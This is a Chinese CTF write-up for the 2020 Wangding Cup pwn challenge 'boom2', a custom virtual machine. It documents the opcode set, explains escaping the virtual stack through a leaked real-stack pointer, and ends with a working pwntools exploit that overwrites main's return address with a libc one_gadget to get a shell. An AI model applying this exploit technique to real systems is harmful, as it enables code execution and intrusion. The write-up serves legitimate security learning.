[pwn]VMpwn:2020网鼎杯青龙组pwn boom2 wp
2020网鼎杯青龙组pwn boom2 wp
比赛的时候被特斯拉那道隐写恶心到了,导致一直在肝那道题,也没看pwn,赛后看了组内大佬的wp,感觉这道pwn也不是很难,于是自己又做了一遍。这道题总共80+队伍做出来,反而更难的pwn1 boom1却有200+队伍做出来,不得不说py真的很严重,赛后我看群里说比赛的时候好像有一份pwn1的exp在全网流通,有点小恶,但也无所谓,名词不重要,自己学到东西才是最重要的。
题目分析
首先检查一下安全策略:
安全策略全开,然后简单看一下逻辑:
执行之后让你输入code,随便输了一些东西之后就啥也没有了。。。只能逆向看了:
看到程序基本只有一个main函数,几乎全部的逻辑都是在main函数里完成的,可以看到main函数主要部分是一个非常大的switch结构:
一般情况这种题目都是VM pwn或者是一个解释器。这道题目是一个VM Pwn。
VM Pwn就是题目自定义了一套指令系统,并且模拟了一套CPU的环境(寄存器、栈等结构)我们需要通过逆向分析题目给定的指令系统,使用这些指令来读写虚拟内存之外的数据,也就是简单的虚拟机逃逸。
本题逻辑不是很复杂:
题目先申请了两个大小为0x40000的内存空间,一块用作虚拟栈,另一块用作我们输入的数据缓冲区。接下来对虚拟站进行了初始化,栈初始结构大概如下:
sp : bp(虚拟栈底指针bp)
bp-3: real_stack(真实栈指针)
bp-2: 0
bp-1: 13
bp : 30
可以从gdb中看出栈顶下面的一个地址是指向真实栈空间的:
我们可以利用这一个指向真实栈的地址来进行逃逸。
然后就是一个巨大的switch结构:
大体功能就是,从我们输入的内容中获取一个int64长度的值作为指令,最多执行30个指令。各个指令并不难分析,有一些指令附带操作数(opcode),有一些指令没有,分析结果如下:
0 opcode: reg=[sp+opcode]
1 opcode: reg=opcode
6 opcode: push bp; bp=sp; sp-=opcode
8 opcode: leave; ret
9 : reg=[reg]
10 : reg=char([reg])
11 : [sp]=reg(int64)
12 : [sp]=reg(byte)
13 : push reg
14 : [sp]=[sp] | reg; pop reg
15 : [sp]=[sp] ^ reg; pop reg
16 : [sp]=[sp] & reg; pop reg
17 : [sp]=[sp] == reg; pop reg
18 : [sp]=[sp] != reg; pop reg
19 : [sp]=[sp] < reg; pop reg
20 : [sp]=[sp] > reg; pop reg
21 : [sp]=[sp] <= reg; pop reg
22 : [sp]=[sp] >= reg; pop reg
23 : [sp]=[sp] << reg; pop reg
24 : [sp]=[sp] >> reg; pop reg
25 : [sp]=[sp] + reg; pop reg
26 : [sp]=[sp] - reg; pop reg
27 : [sp]=[sp] * reg; pop reg
28 : [sp]=[sp] / reg; pop reg
29 : [sp]=[sp] % reg; pop reg
30 : exit
漏洞利用
这些指令本身没什么大问题,问题在于虚拟栈初始状态中里面有一个指向实际栈的指针,而我们可以通过加减运算来和9指令就可以获取实际栈上的值(但无法回显,只能参与运算)。通过11和12指令可以改写实际栈上的值。
大体思路就是利用上述修改栈上值的手段修改栈上main函数的返回值为onegadget。首先要看一下有哪些gadget(这里用的是我自己的环境libc-2.27.so,比赛环境libc好像是跟第一题一样)
可以断在main函数返回的地方,来看一下满足哪个onegadget:
可以看出满足第一个onegadget。
然后是计算libc的地址,我们可以直接从栈上寻找:
可以看到main函数的返回地址(libc_start_main+231)正好是libc中的地址。那么我们可以直接通过这个地址计算出onegadget的地址并且覆盖回这个地址就好了(省事了。。。)
虚拟栈中的真实栈指针与返回地址的偏移为:0x7ffc2f666330-0x7ffc2f666248=0xe8
利用步骤如下:
- 首先进行一次pop将初始栈顶的bp pop出来
- 这时栈顶就是真实栈指针了,然后利用指令1将reg寄存器置为便宜0xe8,然后利用指令26,让栈指针减0xe8,并利用指令13将结果重新入栈
- 使用指令9取值,获取返回地址处的值(也就是libc_start_main+231的地址),并用13指令将获取到的值入栈
- 利用指令1将reg置为libc_start_main+231的偏移值offset,然后利用指令26让libc_start_main+231地址减偏移,得到libc的基址,并用13指令将获取到的libc基址入栈
- 利用指令1将reg置为onegadget的偏移offset,然后利用指令25计算出libc基址加onegadget偏移,也就是onegadget的地址
- 这时栈顶是之前步骤2入栈的返回地址指针,利用指令11将onegadget写入覆盖返回地址
- 然后直接发送即可。
exp如下:
from pwn import *
context.terminal=['tmux','splitw','-h']
p=process("./pwn")
#gdb.attach(p,"""
#b *$rebase(0xa0e)
#b *$rebase(0xa36)
#""")
libc231=0x7f9848c0cb97-0x7f9848beb000
onegadget=0x4f2c5
print p.recv()
payload=p64(14) #步骤1
payload+=p64(1)+p64(0xe8)+p64(26)+p64(13) #步骤2
payload+=p64(9)+p64(13) #步骤3
payload+=p64(1)+p64(libc231)+p64(26)+p64(13) #步骤4
payload+=p64(1)+p64(onegadget)+p64(25) #步骤5
payload+=p64(11) #步骤6
p.send(payload) #步骤7
p.interactive()
利用成功:
多说一嘴,比赛的时候并没有提供libc,组里大佬用的pwn1的libc做成功了。本质上来讲这道题并不是很难,如果“如何获取libc”也是考点的话,出题人希望以此来增加难度,那我只能说:辣鸡。